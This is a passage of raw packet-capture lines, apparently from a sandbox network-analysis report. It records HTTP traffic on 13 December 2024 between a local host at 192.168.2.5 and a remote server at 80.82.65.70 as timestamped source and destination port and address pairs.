                                          Dec 13, 2024 06:12:58.356944084 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.357002974 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.384120941 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.384200096 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.384208918 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.384253025 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.384645939 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.384725094 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.384737968 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.384785891 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.385752916 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.385806084 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.385879993 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.385930061 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.387186050 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.387239933 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.387276888 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.387331963 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.388590097 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.388648033 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.388714075 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.388765097 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.389997959 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.390048027 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.390101910 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.390151978 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.391417027 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.391467094 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.391504049 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.391551018 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.392819881 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.392888069 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.392920017 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.392968893 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.394243956 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.394292116 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.394402027 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.394449949 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.395648003 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.395695925 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.395785093 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.395837069 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.397124052 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.397175074 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.397196054 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.397248983 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.398493052 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.398541927 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.398561954 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.398607969 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.399904966 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.399966955 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.400002003 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.400043964 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.401309013 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.401357889 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.401393890 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.401432991 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.402746916 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.402825117 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.402863026 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.402951002 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.404143095 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.404211044 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.404243946 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.404309034 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.405579090 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.405631065 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.405666113 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.405709028 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.406984091 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.407037020 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.407047987 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.407088995 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.408406019 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.408454895 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.408485889 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.408528090 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.409833908 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.409892082 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.409914970 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.409964085 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.411215067 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.411269903 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.411355972 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.411402941 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.412628889 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.412682056 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.412750959 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.412801981 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.414055109 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.414102077 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.414135933 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.414190054 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.415452957 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.415496111 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.415558100 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.415601969 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.416915894 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.416975021 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.417011023 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.417054892 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.418313026 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.418371916 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.418432951 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.418477058 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.419697046 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.419754028 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.419785023 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.419835091 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.461574078 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.461635113 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.461671114 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.461714029 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.462021112 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.462069035 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.462136984 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.462181091 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.463038921 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.463115931 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.463145018 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.463191032 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.464014053 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.464067936 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.464123964 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.464189053 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.465014935 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.465068102 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.465095043 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.465141058 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.466010094 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.466084003 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.466172934 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.466212988 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.467004061 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.467057943 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.467092037 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.467133999 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.467981100 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.468027115 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.468064070 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.468110085 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.468971968 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.469019890 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.469078064 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.469120026 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.469929934 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.469979048 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.470068932 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.470110893 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.470942020 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.470983982 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.471045971 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.471096992 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.471903086 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.471960068 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.472006083 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.472050905 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.472944021 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.473026037 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.473040104 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.473066092 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.473877907 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.473929882 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.497642040 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.497705936 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.497785091 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.497796059 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.497834921 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.497867107 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.497881889 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.497931957 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.498785973 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.498850107 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.498887062 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.498939991 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.499783993 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.499836922 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.499882936 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.499983072 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.500744104 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.500791073 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.500864983 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.500915051 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.501739025 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.501790047 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.501831055 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.501878977 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.502722979 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.502772093 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.502881050 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.502950907 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.503755093 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.503767014 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.503814936 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.503830910 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.504687071 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.504750013 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.504793882 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.504848003 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.505672932 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.505717993 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.505789995 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.505831003 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.506669998 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.506715059 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.540880919 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.540954113 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.540985107 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.541332960 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.541368008 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.541368008 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.541434050 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.541521072 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.542324066 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.542372942 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.542434931 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.542479038 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.543297052 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.543333054 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.575962067 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.576021910 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.576049089 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.576097012 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.576481104 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.576541901 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.576571941 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.576610088 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.577445984 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.577491045 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.577588081 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.577640057 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.578428030 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.578474998 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.578542948 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.578584909 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.579400063 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.579442978 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.579514027 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.579555988 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.580399036 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.580459118 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.580487967 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.853322029 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.853357077 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.853395939 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.854151964 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.854198933 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.854305029 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.854347944 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.855026960 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.855078936 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.855130911 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.855170012 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.855895996 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.855943918 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.855993986 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.856043100 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.856759071 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.856839895 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.882045984 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.882091999 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.882106066 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.882138968 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.882339001 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.882375002 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.882390022 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.882417917 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.883162022 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.883213043 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.883249998 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.883295059 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.884047985 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.884093046 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.884104967 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.884150982 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.884938955 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.884989023 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.885029078 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.885076046 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.885804892 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.885854006 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.885914087 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.885961056 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.886672974 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.886722088 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.886765003 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.886817932 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.887511969 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.887559891 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.887607098 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.887660027 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.888390064 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.888461113 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.888500929 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.888567924 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.889278889 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.889318943 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.889327049 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.889363050 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.924794912 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.924854994 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.924911022 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.924958944 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.925228119 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.925276041 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.925338030 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.925385952 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.926130056 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.926177025 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.926219940 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.926266909 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.926949978 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.926999092 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.960035086 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.960045099 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.960139990 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.960223913 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.960223913 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.960223913 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.960302114 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.960356951 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.961072922 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.961127043 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.961214066 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.961261034 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.961924076 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.962018013 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.962055922 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.962055922 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.962747097 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.962798119 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.962843895 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.962891102 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.963604927 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.963656902 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.963710070 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.963757038 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.964502096 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.964551926 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.964643002 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.964692116 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.965359926 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.965409040 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.965472937 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.965518951 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.966233015 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.966279984 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.966351986 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.966397047 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.967087030 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.967140913 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.967185020 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.967238903 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.967947006 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.967999935 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.968060970 CET804978680.82.65.70192.168.2.5
